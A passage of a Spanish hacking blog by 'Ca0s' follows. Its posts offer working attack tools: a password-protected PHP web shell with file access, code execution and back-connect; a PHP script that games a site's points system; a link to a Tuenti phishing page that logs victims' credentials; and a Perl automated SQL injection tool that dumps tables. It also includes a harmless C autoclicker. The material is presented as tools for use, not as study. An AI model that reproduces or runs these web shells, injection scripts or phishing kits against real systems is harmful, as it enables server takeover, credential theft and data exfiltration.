Publicado el 29/01/2010 12:01:00 en Programación General. Total de votos: 2 Votar
Una tontada que hice esta tarde para cheatear en un juego, la posteo por darle vida a mi blog mas que nada XD:
#include <stdio.h>
#include <windows.h>
int getnum(int *result) // Esta la vi por internet un dia y me he acordado.
{ // Lo mismo se podria haber hecho mas facil sin funcion, pero... pereza
char buff [ 13 ];
return fgets(buff, sizeof buff, stdin) && sscanf(buff, "%d", result) == 1;
}
int main()
{
printf("<<<<-- Ca0s Autoclicker -->>>>\n");
printf("\n[-] Numero de clicks: ");
int clicks;
do getnum(&clicks);
while(!clicks);
printf("\n[-] Tiempo entre cada click (0 para no esperar): ");
int sleep;
getnum(&sleep);
printf("\n[+] Pulsa una intro para empezar...");
int charr;
charr=fgetc(stdin);
printf("\n[+] Clicks: %d ; Espera: %d", clicks, sleep);
printf("\n[+] Tienes 5 segundos para cambiar de ventana y situar el cursor!\n");
// Sleep inicial para dar tiempo a abrir otra ventana...
Sleep(5000);
int i;
for(i=0; i<clicks; i++)
{
mouse_event(MOUSEEVENTF_LEFTDOWN | MOUSEEVENTF_LEFTUP, 1, 1, 1, 1);
//mouse_event(MOUSEEVENTF_RIGHTDOWN | MOUSEEVENTF_RIGHTUP, 1, 1, 1, 1); Era un test
if(sleep)
Sleep(sleep);
}
printf("[+] Finalizado.\n\n");
charr=fgetc(stdin);
return 0;
}
Hala, saludos.
Comentarios: 10 | Leer comentariosPublicado el 20/11/2009 12:11:00 en Hacking Tools. Total de votos: 2 Votar
Old:
- Explorador de arvhivos (con edición, descarga y delete).
- Ejecución de código.
- Back-Connect (fixed, antes solo funcionaba si register_globals estaba on)
New:
- SQL explorer.
- Mejorado el explorador de archivos.
- Búsqueda de RootExploit y búsqueda en MilWorm.
- Protección de la shell con contraseña, esquive con errores 404 (personalizable, ver código)
Para la próxima:
- Dump de una BD entera.
- FTP
- Mass deface.
<?php
/*
º PHP Web Shell By Ca0s v1.5 º
º FEATURES: º
º # Server info and exploit search º
º # File exploring / creating / editing / deleting º
º # Code execution º
º # SQL Exploring º
º # Multi-language back-connect º
º TO DO: º
º -Fix some bugs i have to find
º -Improve SQL explorer º
º -Erase PHP errors º
º -FTP Client/Server º
º GREETZ: º
º || W4R10K || Nathaniel || º
º || EvilZone.org || RemoteExecution.org || º
º All people who support me :-) º
º Comunidad latina/española º
*/
session_start();
// If $ask == 1 You must enter the shell whith <name>.php?user=$user&pass=$pass for the first time so the session is set to a valid valour
$user="ca0s";
$pass="ca0s";
$ask=1; // 1 = ask for user and pass \\ 2 = Dont ask for it
if(($_GET["user"]==$user)&&($_GET["pass"]==$pass)||($_SESSION["ok"]==md5($user.$pass)||$ask==0))
{
$_SESSION["ok"]=md5($user.$pass);
/*Upload, delete y download de archivos*/
if(isset($_GET['file']))
{
$archivo=$_GET['file'];
header("Content-Type: application/octet-stream");
header("Content-Disposition: attachment; filename=".basename($archivo));
readfile($archivo);
exit();
}// abrir($_GET['file']) && die;
if(isset($_GET["dfile"]))
@unlink($_GET["dfile"]);
if(isset($_GET['dfold']))
{
$fPath=$_GET['dfold'];
if(is_dir($fPath))
{
$c=countFiles($fPath);
if($c==0)
{
if(rmdir($fPath))
$statemsg="Carpeta <$fPath> borrada.";
else $statemsg="No pudo eliminarse la carpeta.";
}
else $statemsg="La carpeta ha de estar vacía para su eliminación.";
}
}
if(isset($_GET["mkdir"]))
{
if(!@mkdir($_GET["mkdir"], 777))
$statemsg = "No pudo crearse la carpeta.";
else
$statemsg = "Carpeta creada -> ".$_GET["mkdir"];
}
if(isset($_GET["mkfile"]))
{
if(file_exists($_GET["mkfile"]))
$statemsg="Ese archivo ya existe, elige otro nombre.";
else
{
if(!($mkfile=@fopen($_GET["mkfile"], "w"...
Continúa aquí...Comentarios: 6 | Leer comentariosPublicado el 20/09/2009 12:09:00 en Hacking Web. Total de votos: 2 Votar
Una tarde aburrida se me ocurrió como ganarse puntos a saco en DDLR.
Aprovechaba que los comentarios dan un punto y que puedes borrar tus comentarios en tu blog, y codeé un pequeño script que tomaba la sesión PHP, el ID del post en el que comentar (tenía que ser de u propio blog), tu nombre de usuario (para construir algunas URL's) y el número de puntos a ganar.
Después creaba comentarios y los borraba, así de sencillo XD
El único obstáculo era el captcha que saltaba cada 5-20 comentarios hechos/borrados, el script hacia pausa, tu navegabas en DDLR y pasabas el captcha, pulsabas intro y el script seguía.
Aquí el código:
<?php
/*
Exploit para ganarse puntos en DDLR -- By Ca0s [ 16-09-2009 ]
Uso: php ddlr.php COOKIE PUNTOS ID USER
COOKIE = Tu cookie en DDLR
PUNTOS = Numero de puntos a ganar
ID = ID del post en el que comentar /debe ser de tu blog)
USER = Tu nombre de usuario en DDLR
*/
$cookie=$argv[1];
$max=$argv[2];
$id=$argv[3];
$user=$argv[4];
print "\n<:::_= DDLR Points Exploit by Ca0s ;-) =_:::>\n\n";
if($argc!=5) usage();
print "----Cookie: $cookie\n";
print "----Puntos a obtener: $max\n";
print "----ID del post en el que comentar/borrar: $id\n";
print "----Usuario: $user\n";
$puntos=getPoints();
print "----Puntos actuales: $puntos\n";
for($n=1; $n<=$max; $n++)
{
// Posteamos
$ssid=getSsid();
post($ssid);
// Eliminamos el post
delPost();
// Cada 10 puntos volvemos a mostrar los puntos para ver que todo va bien :-)
if(($n % 10)==0)
{
$puntos=getPoints();
print "----Puntos: $puntos\n";
}
// Si no, mostramos la cuenta sin comprobarlo...
else print "----Cuenta: $n\n";
}
function getCode($url)
{
global $cookie;
$ch=curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
curl_setopt($ch, CURLOPT_REFERER, "http://www.diosdelared.com/index.php");
$res=curl_exec($ch);
curl_close($ch);
check($res);
return $res;
}
function getPoints()
{
$web=getCode("http://www.diosdelared.com/home/index.php");
$res1=split("Experiencia: ", $web);
$res2=split("War Games: ", $res1[1]);
$puntos=$res2[0];
$puntos=substr($puntos, 0, 4);
return $puntos;
}
function getSsid()
{
global $id, $cookie, $user;
$url="http://$user.diosdelared.com/?coment=$id";
$ch=curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
curl_setopt($ch, CURLOPT_REFERER, "http://$user.diosdelared.com/index.php");
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla");
$res=curl_exec($ch);
curl_close($ch);
check($res);
$res1=split("...
Continúa aquí...Comentarios: 22 | Leer comentariosPublicado el 18/09/2009 12:09:00 en Hacking Tools. Total de votos: 0 Votar
Ayer en 10 minutos, porque me lo pidió un pibe XD
No necesita ninguna configuración, solo permisos de escritura a log.txt.
Cuando se introducen los datos y se guardan lleva a la victima al tuenti real, me dio pereza programarlo para que además logueara U.U
http://www.megaupload.com/?d=DVWG4V8O
Salu2
Comentarios: 3 | Leer comentariosPublicado el 02/09/2009 12:09:00 en Hacking Tools. Total de votos: 4 Votar
Es una tool que me hice hace tiempo por vagancia de hacerlo manual... Aunque aun se le podrían pulir algunas cosas no tengo ganas -_-
# Busca el numero de valores aa pasarle a la inyeccion
# Extrae nombres de tablas
# Extrae las columnas de la tabla que se quiera
# Permite guardar la tabla en un archivo de texto
Código:
#!/usr/bin/perl
use Switch;
use LWP::Simple;
$sch="char(99,97,48,115,95,118)";
@instrucciones[0]="[/\\/\\/] | Perl SQL Inyector V.1 <----> By Ca0s {Alias sh0k!} | [\\/\\/\\]\n";
@instrucciones[1]="-----------------------------------------------------------------------\n";
@instrucciones[2]="<|-> Uso: perl ".$0."[OBJETIVO] [-s] <-|>\n\n";
@instrucciones[3]="<|>->->->->->->->Ca0s {Stack Error Team}// c40s[at]hotmail[dot]es <-|>\n\n";
$target=$ARGV[0] || die("\n"."@instrucciones");
if($target!~/^http:\/\//)
{
$target="http://".$target;
}
print "\n".@instrucciones[0].$instrucciones[1];
print "\n[+] Objetivo: ".$target."\n";
if($ARGV[1] eq "-s")
{
$skip=1;
}
if($skip==1)
{
print "[-] Saltando comprobaciones...\n";
$code=get($ARGV[0]);
}
else
{
if(!($code=get($ARGV[0])))
{
error(1);
exit(0);
}
}
$code1=scalar(split("\n", get($target." AND 1=2")));
if(!$skip)
{
if($code1==$code)
{
error(2);
exit(0);
}
}
$done1=0;
$iny=" GROUP BY ";
$n=1;
$l1=scalar(split("\n", $code));
while($done1==0)
{
$inyx=$iny.$n;
$atk=$ARGV[0].$inyx;
$web=get($atk);
$l2=scalar(split("\n", $web));
if($l1!=$l2)
{
$pars=$n-1;
print "[+] Nº de parámetros: ".$pars."\n";
$inyeccion=$ARGV[0]." AND 1=2 UNION SELECT concat(".$sch.",1,".$sch.")";
$inyeccion2=$ARGV[0]." AND 1=2 UNION SELECT 1";
for($c=2; $c<=$pars; $c++)
{
$inyeccion=$inyeccion.",concat(".$sch.",".$c.",".$sch.")";
$inyeccion2=$inyeccion2.",".$c;
}
print "[+] Inyecciones:\n -- ".$atk."\n -- ".$inyeccion2."\n";
$done1=1;
}
$n=$n+1;
}
# $pars -> número de valores
print "[+] Valores que imprimen: ";
@vars;
$web=get($inyeccion);
$t;
for($t=1; $t<=$pars; $t++)
{
$val="ca0s_v".$t."ca0s_v";
if(parsetext($inyeccion)=~/$val/)
{
push(@vars, "$t");
}
}
if (@vars==0)
{
error(3);
exit(0);
}
else
{
print "@vars"."\n";
}
print "[+] Probando information_schema...";
$print= "@vars[0]";
$inyis=" AND 1=2 UNION SELECT 1";
$ca0s_is="char(99,97,48,115,95,105,115,95)";
$ca0s_is2="char(99,97,48,115...
Continúa aquí...Comentarios: 2 | Leer comentarios![[x]](http://www.diosdelared.com/images/add.ico)
![[x]](http://www.diosdelared.com/redirect.php?go=http://st4ck-3rr0r.webcindario.com/imagenes/encapuchado.jpg "ca0s")
Nick: ca0s
![[x]](http://www.diosdelared.com/images/tecnico.jpg "Artículo técnico"){kind=small}
[C] Autoclicker simplón